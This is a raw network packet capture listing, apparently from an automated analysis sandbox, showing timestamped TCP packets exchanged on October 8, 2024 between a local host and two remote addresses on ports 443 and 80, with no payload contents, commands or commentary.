Oct 8, 2024 20:47:29.440864086 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.440932035 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.441066027 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.441075087 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.487627029 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.488142967 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.488219976 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.488604069 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.488615990 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.593027115 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.593159914 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.593342066 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.593398094 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.593398094 CEST	49815	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.593434095 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.593456030 CEST	443	49815	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.596359015 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.596440077 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.596535921 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.596688986 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.596716881 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.607777119 CEST	49813	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.607804060 CEST	443	49813	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.642432928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642452002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642462969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642514944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642618895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642630100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642640114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642652988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642677069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642698050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642846107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642855883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642865896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642875910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642887115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642898083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642909050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642914057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642923117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642925024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642935991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.642940998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642968893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.642995119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643203974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643359900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643369913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643379927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643388987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643404007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643409014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643421888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643431902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643435955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643443108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643454075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643464088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643465042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643476009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643487930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643491030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643512964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643529892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643770933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643822908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643889904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643899918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643909931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643920898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643929958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643934011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643946886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643949986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643958092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643968105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643971920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.643979073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.643989086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644000053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644010067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644020081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644021034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644032955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644041061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644048929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644068003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644083023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644110918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644802094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644812107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644820929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644831896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644843102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644855022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644855976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644865990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644877911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644890070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644890070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644900084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644907951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644911051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644923925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.644937992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644959927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.644978046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645528078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645538092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645548105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645558119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645570040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645581007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645591974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645595074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645601988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645612955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645622969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645626068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645642996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645642996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645654917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645654917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645664930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645675898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645687103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645687103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645697117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645699978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645708084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645716906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645730019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645739079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.645744085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645770073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.645781994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646692991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646703959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646713972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646724939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646734953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646744967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646745920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646756887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646768093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646773100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646778107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646794081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646795034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646806955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646816969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646822929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646822929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646827936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646837950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646852016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646853924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646862984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646872997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646873951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646884918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646895885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646898031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646905899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.646929026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.646951914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.647891998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647907972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647927046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647939920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647948027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.647953033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647964001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647975922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.647977114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.647996902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648000002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648010969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648021936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648027897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648041010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648060083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648060083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648072004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648080111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648083925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648102999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648108006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648116112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.648137093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.648174047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.729947090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.729959965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.729969978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.729980946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.729991913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730003119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730015993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730102062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730113029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730120897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730120897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730123997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730135918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730154037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730163097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730192900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730323076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730333090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730346918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730356932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730366945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730377913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730384111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730395079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730400085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730406046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730416059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730417967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730428934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730439901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730441093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730452061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730460882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730463028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730473042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730473995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730484962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730493069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730496883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730509996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730520010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730540037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730552912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730696917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730706930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730717897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730745077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730765104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730835915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730846882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730855942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730869055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730878115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730880022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730890036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730904102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.730906963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730926037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.730951071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731126070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731137037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731147051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731175900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731184959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731291056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731302023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731317043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731328011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731338024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731344938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731349945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731360912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731370926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731380939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731383085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731385946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731395006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731408119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731420040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731424093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731435061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731446028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731453896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731457949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731468916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731479883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731479883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731489897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731502056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731502056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.731509924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731538057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.731554031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732259989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732270002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732279062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732297897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732306004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732310057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732320070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732328892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732331991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732343912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732345104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732353926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732364893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732374907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732377052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732387066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732398033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732404947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732408047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732418060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732419014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732429028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732436895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732439041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732449055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732459068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732460976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732474089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.732486963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732501030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.732520103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733264923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733274937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733283997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733294010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733304024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733309984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733314037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733324051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733331919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733335018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733344078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733349085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.733355045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733366013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733376026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.733376980 CEST	49755	80	192.168.2.5	95.164.90.97
